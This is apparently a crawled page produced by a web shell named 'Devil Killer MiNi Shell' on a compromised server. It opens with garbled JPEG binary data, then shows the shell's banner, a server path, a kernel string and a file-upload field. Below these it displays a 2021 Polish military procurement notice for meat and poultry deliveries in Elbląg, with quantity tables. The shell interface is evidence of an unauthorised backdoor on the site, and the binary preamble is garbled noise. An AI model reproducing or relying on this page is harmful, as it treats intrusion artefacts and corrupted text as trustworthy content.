JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211129/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211129/0028965401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP I DOSTAWY MIĘSA ORAZ WĘDLIN W 2022 R. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy w Elblągu </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP I DOSTAWY MIĘSA ORAZ WĘDLIN W 2022 R. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0944b905-4db9-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00289654</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/21wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/21wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej opisane zostały w Regulaminie Internetowej Platformy zakupowej, dostępnym pod adresem https://platformazakupowa.pl/strona/1-regulamin<br/>oraz Instrukcji dla Wykonawców dostępnej pod adresem https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/><br/> Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/> Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „zakup<br/>i dostawy mięsa oraz wędlin w 2022 r.” nr postępowania 24/SZP/2021;<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania.<br/> Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest<br/>art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">j.w.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21WOG-SZP.2712.27.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawy mięsa oraz wędlin w 2022 r. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1,2a i 4 do SWZ.<br/>ILOŚCI MINIMALNE<br/>Lp. Wyszczególnienie<br/>przedmiotu zamówienia J.m. Miejsca dostaw<br/>Razem<br/>(kol 4+kol 5+kol 6+kol 7)<br/>Grupa Zabezpieczenia<br/>21 WOG Elbląg,<br/>ul. Łęczycka 10-12 Grupa Zabezpieczenia<br/>21 WOG Braniewo,<br/>ul. Sikorskiego 41 Grupa Zabezpieczenia<br/>21 WOG Bartoszyce,<br/>ul. Wojska Polskiego 4 Grupa Zabezpieczenia<br/>21 WOG Morąg,<br/>Al. Wojska Polskiego 16<br/>1 2 3 4 5 6 7 8<br/>1. Antrykot wołowy b/k kręg. kg 55 55 55 55 220<br/>2. Wołowina ekstra kg 173 173 173 173 692<br/>3. Polędwica wieprzowa kg 68 68 68 68 272<br/>4. Wołowina zrazowa b/k kg 41 41 41 41 164<br/>5. Karkówka wieprzowa b/k kg 250 250 250 250 1000<br/>6. Łopatka wieprzowa b/k kg 250 250 250 250 1000<br/>7. Schab wieprzowy b/k kg 263 236 263 263 1052<br/>8. Boczek surowy b/k kg 56 56 56 56 224<br/>9. Żeberka wieprzowe kg 125 125 125 125 500<br/>10. Szynka wieprzowa b/k kg 125 125 125 125 500<br/>11. Mięso wieprzowe od szynki b/k drobne kg 60 60 60 60 240<br/>12. Golonka wieprzowa z/k kg 8 8 8 8 32<br/>13. Wątroba wieprzowa kg 30 30 30 30 120<br/>14. Pasztetowa kg 31 31 31 31 124<br/>15. Salceson włoski kg 25 25 25 25 100<br/>16. Salceson ozorkowy kg 28 28 28 28 112<br/>17. Kaszanka z kaszy gryczanej kg 44 44 44 44 176<br/>18. Kiełbasa salami kg 30 30 30 30 120<br/>19. Kiełbasa myśliwska kg 57 57 57 57 228<br/>20. Kiełbasa jałowcowa kg 53 53 53 53 212<br/>21. Kiełbasa parówkowa kg 44 44 44 44 176<br/>22. Parówki z szynki kg 76 76 76 76 304<br/>23. Mortadela kg 26 26 26 26 104<br/>24. Kiełbasa biała parzona kg 50 50 50 50 200<br/>25. Kiełbasa podlaska kg 70 70 70 70 280<br/>26. Kiełbasa wiejska kg 71 71 71 71 284<br/>27. Kiełbasa śląska kg 74 74 74 74 296<br/>28. Kiełbasa toruńska kg 75 75 75 75 300<br/>29. Kiełbasa zwyczajna kg 101 101 101 101 404<br/>30. Kiełbasa krakowska parzona kg 60 60 60 60 240<br/>31. Kiełbasa szynkowa wieprzowa kg 60 60 60 60 240<br/>32. Kiełbasa krakowska sucha kg 62 62 62 62 248<br/>33. Kiełbasa żywiecka kg 74 74 74 74 296<br/>34. Kabanosy kg 60 60 60 60 240<br/>35. Baleron kg 72 72 72 72 288<br/>36. Salami kg 38 38 38 38 152<br/>37. Polędwica wieprzowa wędzona kg 56 56 56 56 224<br/>38. Szynka wieprzowa wędzona kg 55 55 55 55 220<br/>39. Szynka wieprzowa gotowana kg 57 57 57 57 228<br/>40. Szynka wieprzowa konserwowa kg 75 75 75 75 300<br/>41. Boczek wędzony parzony b/k kg 101 101 101 101 404<br/>42. Rolada z boczku kg 58 58 58 58 232<br/>43. Pasztet wieprzowy pieczony kg 41 41 41 41 164<br/>44. Golonka wieprzowa kg 35 35 35 35 140<br/>45. Ogonówka kg 50 50 50 50 200<br/>46. Schab pieczony kg 42 42 42 42 168<br/>47. Flaki wołowe krojone blanszowane kg 25 25 25 25 100<br/><br/>ILOŚCI MAKSYMALNE<br/>Lp. Wyszczególnienie<br/>przedmiotu zamówienia J.m. Miejsca dostaw<br/>Razem<br/>(kol 4+kol 5+kol 6+kol 7)<br/>Grupa Zabezpieczenia<br/>21 WOG Elbląg,<br/>ul. Łęczycka 10-12 Grupa Zabezpieczenia<br/>21 WOG Braniewo,<br/>ul. Sikorskiego 41 Grupa Zabezpieczenia<br/>21 WOG Bartoszyce,<br/>ul. Wojska Polskiego 4 Grupa Zabezpieczenia<br/>21 WOG Morąg,<br/>Al. Wojska Polskiego 16<br/>1 2 3 4 5 6 7 8<br/>1. Antrykot wołowy b/k kręg. kg 200 200 200 200 800<br/>2. Wołowina ekstra kg 405 405 405 405 1620<br/>3. Polędwica wieprzowa kg 160 160 160 160 640<br/>4. Wołowina zrazowa b/k kg 150 150 150 150 600<br/>5. Karkówka wieprzowa b/k kg 600 600 600 600 2400<br/>6. Łopatka wieprzowa b/k kg 600 600 600 600 2400<br/>7. Schab wieprzowy b/k kg 615 615 615 615 2460<br/>8. Boczek surowy b/k kg 135 135 135 135 540<br/>9. Żeberka wieprzowe kg 300 300 300 300 1200<br/>10. Szynka wieprzowa b/k kg 300 300 300 300 1200<br/>11. Mięso wieprzowe od szynki b/k drobne kg 150 150 150 150 600<br/>12. Golonka wieprzowa z/k kg 20 20 20 20 80<br/>13. Wątroba wieprzowa kg 65 65 65 65 260<br/>14. Pasztetowa kg 75 75 75 75 300<br/>15. Salceson włoski kg 60 60 60 60 240<br/>16. Salceson ozorkowy kg 70 70 70 70 280<br/>17. Kaszanka z kaszy gryczanej kg 105 105 105 105 420<br/>18. Kiełbasa salami kg 75 75 75 75 300<br/>19. Kiełbasa myśliwska kg 145 145 145 145 580<br/>20. Kiełbasa jałowcowa kg 145 145 145 145 580<br/>21. Kiełbasa parówkowa kg 115 115 115 115 460<br/>22. Parówki z szynki kg 240 240 240 240 960<br/>23. Mortadela kg 65 65 65 65 260<br/>24. Kiełbasa biała parzona kg 125 125 125 125 500<br/>25. Kiełbasa podlaska kg 180 180 180 180 720<br/>26. Kiełbasa wiejska kg 180 180 180 180 720<br/>27. Kiełbasa śląska kg 180 180 180 180 720<br/>28. Kiełbasa toruńska kg 195 195 195 195 780<br/>29. Kiełbasa zwyczajna kg 245 245 245 245 980<br/>30. Kiełbasa krakowska parzona kg 150 150 150 150 600<br/>31. Kiełbasa szynkowa wieprzowa kg 150 150 150 150 600<br/>32. Kiełbasa krakowska sucha kg 145 145 145 145 580<br/>33. Kiełbasa żywiecka kg 175 175 175 175 700<br/>34. Kabanosy kg 145 145 145 145 580<br/>35. Baleron kg 170 170 170 170 680<br/>36. Salami kg 110 110 110 110 440<br/>37. Polędwica wieprzowa wędzona kg 150 150 150 150 600<br/>38. Szynka wieprzowa wędzona kg 150 150 150 150 600<br/>39. Szynka wieprzowa gotowana kg 150 150 150 150 600<br/>40. Szynka wieprzowa konserwowa kg 185 185 185 185 740<br/>41. Boczek wędzony parzony b/k kg 235 235 235 235 940<br/>42. Rolada z boczku kg 145 145 145 145 580<br/>43. Pasztet wieprzowy pieczony kg 100 100 100 100 400<br/>44. Golonka wieprzowa kg 95 95 95 95 380<br/>45. Ogonówka kg 145 145 145 145 580<br/>46. Schab pieczony kg 120 120 120 120 480<br/>47. Flaki wołowe krojone blanszowane kg 75 75 75 75 300<br/>Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Szczegółowe ilości maksymalne zostały określone w Opisie Przedmiotu Zamówienia i Formularzu Cenowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15111100-0 - Wołowina</p> <p class="mb-0">15113000-3 - Wieprzowina</p> <p class="mb-0">15114000-0 - Podroby</p> <p class="mb-0">15131120-2 - Produkty wędliniarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji asortymentowej ilości minimalne i maksymalne stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-02 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant dostaw - 40%<br/>2. Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2<br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant dostaw”<br/><br/>3. W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/>najniższa oferowana cena brutto dla ilości minimalnych<br/>Liczba punktów = --------------------------------------------------------- x 100 pkt x 60%<br/>cena brutto dla ilości minimalnych oferty badanej<br/><br/>W kryterium „Przyjęty do realizacji wariant dostaw” oferta uzyska:<br/>• 0 pkt za WARIANT I – dostawy w każdy wtorek i czwartek(w przypadku, gdy<br/>w ww. dzień wypada dzień świąteczny dostawa w poprzednim dniu roboczym)<br/>• 20 pkt za WARIANT II – dostawy w każdy poniedziałek, środa i piątek<br/>(w przypadku, gdy w ww. dzień wypada dzień świąteczny dostawa w poprzednim dniu roboczym)<br/>• 40 pkt za WARIANT III – dostawy w każdy poniedziałek, wtorek, czwartek<br/>i piątek (w przypadku, gdy w ww. dzień wypada dzień świąteczny dostawa<br/>w poprzednim dniu roboczym)<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>1) Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>2) W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT I, w związku z tym otrzyma 0 pkt.<br/>3) Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty;<br/>4) Dostawy do magazynów Zamawiającego w godz. 8:00-13:30, w piątek 8:00-12:00.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawy mięsa oraz wędlin w 2022 r. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1,2a i 4 do SWZ.<br/>ILOŚCI MINIMALNE<br/><br/>Lp. Wyszczególnienie<br/>przedmiotu zamówienia J.m. Miejsca dostaw<br/>Razem<br/>(kol 4+kol 5+kol 6+kol 7)<br/>Grupa Zabezpieczenia<br/>21 WOG Elbląg,<br/>ul. Królewiecka 130<br/>ul. Łęczycka 10-12 Grupa Zabezpieczenia<br/>21 WOG Braniewo,<br/>ul. Sikorskiego 41 Grupa Zabezpieczenia<br/>21 WOG Bartoszyce,<br/>ul. Wojska Polskiego 4 Grupa Zabezpieczenia<br/>21 WOG Morąg,<br/>Al. Wojska Polskiego 16<br/>1 2 3 4 5 6 7 8<br/>1. Noga z kurczaka mrożona kg 25 25 25 25 100<br/><br/>2. Noga z kurczaka kg 250 250 250 250 1000<br/>3. Filet z piersi kurczaka mrożony kg 25 25 25 25 100<br/>4. Filet z piersi kurczaka kg 285 285 285 285 1140<br/>5. Filet z piersi indyka mrożony kg 25 25 25 25 100<br/>6. Filet z piersi indyka kg 100 100 100 100 400<br/>7. Filet z piersi kaczki kg 35 35 35 35 140<br/>8. Skrzydełka z kurczaka kg 30 30 30 30 120<br/>9. Wątroba z kurczaka kg 40 40 40 40 160<br/>10. Żołądki kurczaka kg 50 50 50 50 200<br/>11. Kabanosy drobiowe kg 75 75 75 75 300<br/>12. Kiełbasa szynkowa drobiowa kg 100 100 100 100 400<br/>13. Parówki z fileta z kurczaka kg 100 100 100 100 400<br/>14. Szynka drobiowa kg 75 75 75 75 300<br/>15. Szynka z indyka kg 75 75 75 75 300<br/>16. Mortadela drobiowa kg 75 75 75 75 300<br/><br/><br/>ILOŚCI MAKSYMALNE<br/>Lp. Wyszczególnienie<br/>przedmiotu zamówienia J.m. Miejsca dostaw<br/>Razem<br/>(kol 4+kol 5+kol 6+kol 7)<br/>Grupa Zabezpieczenia<br/>21 WOG Elbląg,<br/>ul. Królewiecka 130<br/>ul. Łęczycka 10-12 Grupa Zabezpieczenia 21 WOG Braniewo,<br/>ul. Sikorskiego 41 Grupa Zabezpieczenia 21 WOG Bartoszyce,<br/>ul. Wojska Polskiego 4 Grupa Zabezpieczenia 21 WOG Morąg,<br/>Al. Wojska Polskiego 16<br/>1 2 3 4 5 6 7 8<br/>1. Noga z kurczaka mrożona kg 65 65 65 65 260<br/><br/>2. Noga z kurczaka kg 650 650 650 650 2600<br/>3. Filet z piersi kurczaka mrożony kg 65 65 65 65 260<br/>4. Filet z piersi kurczaka kg 670 670 670 670 2680<br/>5. Filet z piersi indyka mrożony kg 65 65 65 65 260<br/>6. Filet z piersi indyka kg 350 350 350 350 1400<br/>7. Filet z piersi kaczki kg 90 90 90 90 360<br/>8. Skrzydełka z 